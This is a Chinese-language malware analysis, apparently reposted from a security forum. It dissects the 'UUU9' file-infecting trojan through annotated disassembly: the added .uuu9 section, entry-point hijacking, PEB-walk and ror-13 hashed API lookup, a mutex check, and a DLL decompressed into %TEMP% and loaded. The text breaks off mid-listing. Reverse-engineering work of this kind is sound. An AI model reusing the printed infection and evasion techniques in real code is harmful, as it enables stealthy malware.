UUU9病毒分析.docx
《UUU9病毒分析.docx》由会员分享,可在线阅读,更多相关《UUU9病毒分析.docx(23页珍藏版)》请在冰豆网上搜索。
UUU9病毒分析
UUU9病毒分析
--by[看雪]·blueapplez
简介:
此病毒为一盗号木马(我猜的)。
它会感染exe可执行文件,被感染的文件会被增加一个区段,区段名字叫".uuu9",故且把此病毒命名为UUU9病毒。
被感染的程序入口点代码被修改,会执行一段特定的代码,并释放一个随机命名的dll到Temp目录并加载,然后执行此dll的一个导出函数。
此病毒分析分为2部分,第一部分讲解被感染的程序的执行流程,第二部分讲解dll里面的逻辑。
第一部分·被感染程序的执行流程
先看下被感染的程序的区段信息,多个一个uuu9区段,如下图所示:
[被感染的程序区段信息]
感染前的区段信息
发现除了多了一个区段外,还把.text区段的属性给改了,增加了一个可写属性.
新区段的大小为0x2000,刚好是8K,查一下文件属性,也恰好大了8K。
【入口点】分析:
0040990F>$60pushad;保存现场
00409910.8BECmovebp,esp
00409912.83EC4Csubesp,4C
00409915.8BFCmovedi,esp;保存新esp
00409917.E9D2010000jmp00409AEE;这个jmp跳到后面一个地方然后又call了回来应该是为了获得call函数下条指令的地址吧
0040991C$5Epopesi;保存call下条指令的地址,esi=00409AEE+5=00409af3
0040991D.57pushedi;新esp入栈
0040991E.B94C000000movecx,4C
00409923.F3:
A4repmovsbyteptres:
[edi],byteptr[esi];把00409af3处代码拷贝到堆栈拷贝0x4c个字节,这4c个字节的数据是作者精心构造的数据,后面获得一些api地址都用到了这些数据
00409925.5Epopesi;esi=新的esp地址
00409926.8BFEmovedi,esi;edi恢复为新esp地址
00409928.64:
A13000000>moveax,dwordptrfs:
[30];这段代码好熟悉呀!
获得Kernel基址不分析了。
都快用烂了
0040992E.8B400Cmoveax,dwordptr[eax+C]
00409931.8B400Cmoveax,dwordptr[eax+C]
00409934.8B00moveax,dwordptr[eax]
00409936.8B5818movebx,dwordptr[eax+18]
00409939.53pushebx;把ntdll的基址入栈
0040993A.8B00moveax,dwordptr[eax]
0040993C.8B5818movebx,dwordptr[eax+18];ebx=kernel32.dll基址
0040993F.6A0Epush0E;这地方会获得14个函数地址:
LoadLibraryAGetProcessAddressVirtualAllocVirtualFreeGetModuleHandleASetErrorModeOpenMutexACloseHandleExitProcessExpandEnvironmentStringsA_lcreat_lwrite_lcloseGetTickCount,至于为什么要分析00409AA9这个函数,很精彩的一个函数
00409941.59popecx;ecx=0x0e循环14次
00409942>E862010000call00409AA9;此call非常精彩后面有分析
00409947.83C704addedi,4;调整堆栈指针
0040994A.^E2F6loopdshort00409942
0040994C.5Bpopebx;把ntdll基址出栈到ebx
0040994D.E857010000call00409AA9;此处是为了获得ntdll.RtlDecompressBuffer
00409952.E807000000call0040995E;PUSH"user32"这是一个小技巧,把call分解成push00409957,jmp0040995E来理解,本病毒利用了好多此这样的技巧来把字符串压栈
00409957.757365723>ascii"user32",0
0040995E>FF16calldwordptr[esi];LoadLibrary"user32.dll"
00409960.85C0testeax,eax
00409962.747Ejeshort004099E2
00409964.93xchgeax,ebx;非常巧妙的交换后ebx=user32基址eax=ntdll基址
00409965.83C704addedi,4
00409968.E83C010000call00409AA9;为了获得user32.wsprintfA
0040996D.E80C000000call0040997E;PUSHASCII"Yamamoto_56"
00409972.59616D616>ascii"Yamamoto_56",0
0040997E>33C0xoreax,eax
00409980.50pusheax;push0
00409981.40inceax
00409982.50pusheax;push1
00409983.FF5618calldwordptr[esi+18];OpenMutexA(1,0,"Yamamoto_56")
00409986.85C0testeax,eax;这里就是查一下是否这个互斥量已经存在了如果存在了就跳到004099E6,关闭handle然后跳到00409991处继续执行。
00409988.755Cjnzshort004099E6
0040998A.60pushad
0040998B.E85C000000call004099EC;一个重要的call,后面有分析
00409990.61popad
00409991>33FFxoredi,edi
00409993.6A40push40;40
00409995.B800100000moveax,1000
0040999A.50pusheax;1000
0040999B.50pusheax;1000
0040999C.57pushedi;0
0040999D.FF5608calldwordptr[esi+8];VirtualAlloc,申请空间
004099A0.85C0testeax,eax
004099A2.743Ejeshort004099E2
004099A4.93xchgeax,ebx;ebx=new出来的新地址
004099A5.57pushedi
004099A6.FF5610calldwordptr[esi+10];GetModuleHandle
004099A9.92xchgeax,edx;edx=exe模块的handle
004099AA.56pushesi;esi=那个奇怪的堆栈
004099AB.EB25jmpshort004099D2;跳走了又call回来是为了获得一个地址
这个地址就是004099d7
004099AD$5Epopesi;pop到esi,esi=004099d7
004099AE.8BFBmovedi,ebx;edi=new出来的新地址
004099B0.B90B000000movecx,0B;ecx=11
004099B5.F3:
A4repmovsbyteptres:
[edi],byteptr[esi];拷贝11字节到new出来的地址,也就是拷贝004099d7开始的5条汇编指令,这5条汇编指令的意义一会在说
004099B7.5Epopesi
004099B8.8BFAmovedi,edx;ediexe模块地址
004099BA.037E48addedi,dwordptr[esi+48];edi=入口点地址
004099BD.035640addedx,dwordptr[esi+40];edx=uuu9区段的首地址
004099C0.87F2xchgedx,esi;esi=入口点地址
004099C2.B930020000movecx,230;拷贝0x230个字节
004099C7.8BC3moveax,ebx;eax=new出来的那个地址
004099C9.0506000000addeax,6;eax+=6
004099CE.8938movdwordptr[eax],edi;入口点地址给[eax],这个是修改那11个字节里面的一个地址,使其跳到入口点
004099D0.FFE3jmpebx;跳到new的数据里面执行,他里面是堆栈数据,堆栈数据非常简单
004099D2>E8D6FFFFFFcall004099AD
004099D7.F3:
A4repmovsbyteptres:
[edi],byteptr[esi]
004099D9.8BE5movesp,ebp
004099DB.61popad
004099DC.68CCCCCCCCpushCCCCCCCC
004099E1.C3retn
【004099d0处堆栈数据分析】:
//堆栈数据执行,下面解释拷贝的那5条指令的意义
ecx=0x230
esi=uuu9区段首地址
edi=入口点地址
功能描述:
执行这么一个拷贝动作,恢复入口点数据,恢复寄存器,跳到原始的入口点,程序就能正常运行起来了
00940000F3:
A4repmovsbyteptres:
[edi],byteptr[esi]
009400028BE5movesp,ebp
0094000461popad
00940005680F994000pushaaa.<模块入口点>;这两句话相当于jmp入口点,程序就正常的跑起来了
0094000AC3retn
【00409aa9函数】分析:
本是寄存器传参,shellcode果然很灵活多变
ebx是dll基址
edi是一个in out型的堆栈地址
功能描述:
从dll基址获得所有的dll导出函数的名字,然后根据名字字符串做一个简单的运算,比较运算结果是否等于dwordptr[edi],如果相等就把这个函数的地址放到dwordptr[edi],然后返回。
因此此函数可以通过事先算出某个函数的值,获得此函数地址。
隐蔽性和防免杀效果防静态反汇编效果都很好。
00409AA9 /$ 60 pushad;保存现场
00409AAA |. 8BEB mov ebp, ebx ; ebx = kernel32基址
00409AAC |. 8B75 3C mov esi, dword ptr [ebp+3C] ; 取IMAGE_DOS_HEADER的最后一个变量 即IMAGE_NT_HEADER的偏移
00409AAF |. 8B7435 78 mov esi, dword ptr [ebp+esi+78]
00409AB3 |. 03F5 add esi, ebp
00409AB5 |. 56 push esi ; kernel32的导出表地址
00409AB6 |. 8B76 20 mov esi, dword ptr [esi+20] ; 得到IMAGE_EXPORT_DIRECTORY 的 AddressOfNames变量 即函数名称地址表RVA
00409AB9 |. 03F5 add esi, ebp ; 加上kernel32基址
00409ABB |. 33C9 xor ecx, ecx ; ecx = 0
00409ABD |. 49 dec ecx ; 减一是为了后面的数组以0开始计算
00409ABE |> 41 inc ecx
00409ABF |. AD lods dword ptr [esi] ; eax = 一个函数地址
00409AC0 |. 03C5 add eax, ebp ; eax = 加上基址,指向一个函数名字符串
00409AC2 |. 33DB xor ebx, ebx ; ebx=0
00409AC4 |> 0FBE10 /movsx edx, byte ptr [eax] ; 取函数名的第一个字母,符号扩展
00409AC7 |$ 38F2 |cmp dl, dh
00409AC9 |. 74 08 |je short 00409AD3 ; 如果字符串结束了 就跳走。
00409ACB |. C1CB 0D |ror ebx, 0D
00409ACE |. 03DA |add ebx, edx ; ebx += edx
00409AD0 |. 40 |inc eax ; 字符串++
00409AD1 |.^ EB F1 \jmp short 00409AC4
00409AD3 |> 3B1F cmp ebx, dword ptr [edi] ; 如果不等于堆栈里的那个值就跳走
00409AD5 |.^ 75 E7 jnz short 00409ABE ; 最终发现 其实就是为了找某个函数的地址序号,应该是为了免杀吧 搞的如此复杂
00409AD7 |. 5E pop esi ; kernel32的导出表地址 放到esi里面
00409AD8 |. 8B5E 24 mov ebx, dword ptr [esi+24] ; 得到IMAGE_EXPORT_DIRECTORY 的 AddressOfOrdinals变量 即函数序号地址RVA
00409ADB |. 03DD add ebx, ebp ; 加上基址
00409ADD |. 66:
8B0C4B mov cx, word ptr [ebx+ecx*2] ; 每个序号占2个字节 所以要乘以2
00409AE1 |. 8B5E 1C mov ebx, dword ptr [esi+1C] ; 得到IMAGE_EXPORT_DIRECTORY 的 AddressOfFunctions变量 即导出函数地址表的RVA
00409AE4 |. 03DD add ebx, ebp ; 加上基址
00409AE6 |. 8B048B mov eax, dword ptr [ebx+ecx*4] ; 没个地址占4个字节 所以要加4
00409AE9 |. 03C5 add eax, ebp ; 加上基址,eax就是真实函数地址了
00409AEB |. AB stos dword ptr es:
[edi] ; 把eax 放到[edi]存着
00409AEC |. 61 popad
00409AED \. C3 retn
【004099ec函数】分析:
//此函数没有参数
功能描述:
①用GetTickCount获得一个随机数。
②用wsprintf和①获得到的随机数拼出一个形如"%TEMP%29740046.dll"的字符串.
③用ExpandEnvironmentStringsA和②获得的字符串,获得形如"C:
\DOCUME~1\ADMINI~1\LOCALS~1\Temp\29740046.dll"的字符串路径。
关于ExpandEnvironmentStringsA的用法MSND上有介绍。
④用VirtualAlloc申请0x40000(256K)字节空间
⑤用Ntdll.RtlDecompressBuffer函数将.uuu9区段的0x230(内存地址00437230)开始的0x1986个字节进行解压,解压到④申请的那片空间里,解压得到一个dll,dll大小为0x2400.
(关于Ntdll.RtlDecompressBuffer函数参考:
)
⑥将解压得到的dll数据保存到3获得的那个全路径文件里。
⑦LoadLibrary这个dll,然后GetProceAddress序号为5的那个函数地址,然后调用之。
004099EC$55pushebp
004099ED.8BECmovebp,esp
004099EF.81C4D8FEFFFFaddesp,-128
004099F5.FF5634calldwordptr[esi+34]
004099F8.50pusheax
004099F9.E810000000call00409A0E;PUSHASCII"%%TEMP%%\%u.dll"
004099FE.252554454D50>ascii"%%TEMP%%\%u.dll",0
00409A0E>8D9DD8FEFFFFleaebx,dwordptr[ebp-128]
00409A1453pushebx
00409A15FF563Ccalldwordptr[esi+3C]
00409A1883C40Caddesp,0C
00409A1B6804010000push104
00409A20|.8DBDF8FEFFFFleaedi,dwordptr[ebp-108]
00409A26|.57pushedi
00409A27|.53pushebx
00409A28FF5624calldwordptr[esi+24];调用ExpandEnvironmentStringsA
00409A2B33FFxoredi,edi;filename0012FE28"C:
\DOCUME~1\ADMINI~1\LOCALS~1\Temp\29740046.dll"
00409A2D47incedi
00409A2EFF5614calldwordptr[esi+14];SetErrorMode
(1)
00409A314Fdecedi
00409A326A04push4;4
00409A34B800100000moveax,1000
00409A3950pusheax;0x1000
00409A3AC1E006shleax,6
00409A3D50pusheax;0x40000
00409A3E57pushedi;0
00409A3FFF5608calldwordptr[esi+8];VirtualAlloc申请256KB大小内存
00409A4285C0testeax,eax
00409A447461jeshort00409AA7
00409A4693xchgeax,ebx;ebx=new出来的新地址
00409A4757pushedi;push0
00409A48FF5610calldwordptr[esi+10];GetModuleHandle得到eax=004000000
00409A4B8D55FCleaedx,dwordptr[ebp-4]
00
升级会员 